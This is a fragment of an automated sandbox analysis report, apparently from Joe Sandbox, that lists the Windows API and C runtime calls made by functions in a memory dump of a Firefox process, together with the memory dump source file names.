      • Part of subcall function 6E0D4ED6: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000800,6E155FF8,00000000,?,2EA47CDB,?,6E0D4FE4,?,?,00000000,6E155FF8,?,?,6E0D51B8), ref: 6E0D4F1F
      • Part of subcall function 6E0D4ED6: wcsncmp.UCRTBASE(?,api-ms-,00000007,?,00000000,00000800,6E155FF8,00000000,?,2EA47CDB,?,6E0D4FE4,?,?,00000000,6E155FF8), ref: 6E0D4F32
      • Part of subcall function 6E0D4ED6: wcsncmp.UCRTBASE(?,ext-ms-,00000007,6E0D46CE,6E0B60DC,6E0AF4FB), ref: 6E0D4F46
      • Part of subcall function 6E0D4ED6: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,00000000,00000000,?,?,?,6E0D46CE,6E0B60DC,6E0AF4FB), ref: 6E0D4F55
      • Part of subcall function 6E0D4ED6: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,?,00000000,00000800,6E155FF8,00000000,?,2EA47CDB,?,6E0D4FE4,?,?,00000000,6E155FF8), ref: 6E0D4F7B
    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(00000000,6E0D46CE,00000000,6E155FF8,?,?,6E0D51B8,00000008,InitializeCriticalSectionEx,6E0896C0,6E0896C8,00000000,?,?,6E0D48B9,6E155FF8), ref: 6E0D4FEE
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd
    APIs
    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E142688,0000000C,6E0AB6F3), ref: 6E0AB71A
      • Part of subcall function 6E0AC6B9: _wcstombs_s_l.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,6E0AB72C), ref: 6E0AC708
      • Part of subcall function 6E0AC6B9: _malloc_base.UCRTBASE(-00000004,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0AC71F
      • Part of subcall function 6E0AC6B9: _wcstombs_s_l.UCRTBASE(00000000,00000004,00000000,?,000000FF,?,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0AC741
      • Part of subcall function 6E0AC6B9: _invoke_watson.UCRTBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,6E0AB72C), ref: 6E0E5610
      • Part of subcall function 6E0AC6B9: _free_base.UCRTBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0E5628
      • Part of subcall function 6E0AC6B9: _free_base.UCRTBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E0E5649
      • Part of subcall function 6E0AC6B9: _free_base.UCRTBASE(?), ref: 6E0E5677
      • Part of subcall function 6E0AB747: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,6E0AB73D), ref: 6E0AB755
    Memory Dump Source
    • Source File: 00000004.00000002.12848755785.6E081000.00000020.sdmp, Offset: 6E080000, based on PE: true
    • Associated: 00000004.00000002.12848749050.6E080000.00000002.sdmp
    • Associated: 00000004.00000002.12848861431.6E155000.00000004.sdmp
    • Associated: 00000004.00000002.12848881189.6E157000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_6e080000_firefox.jbxd

    Non-executed Functions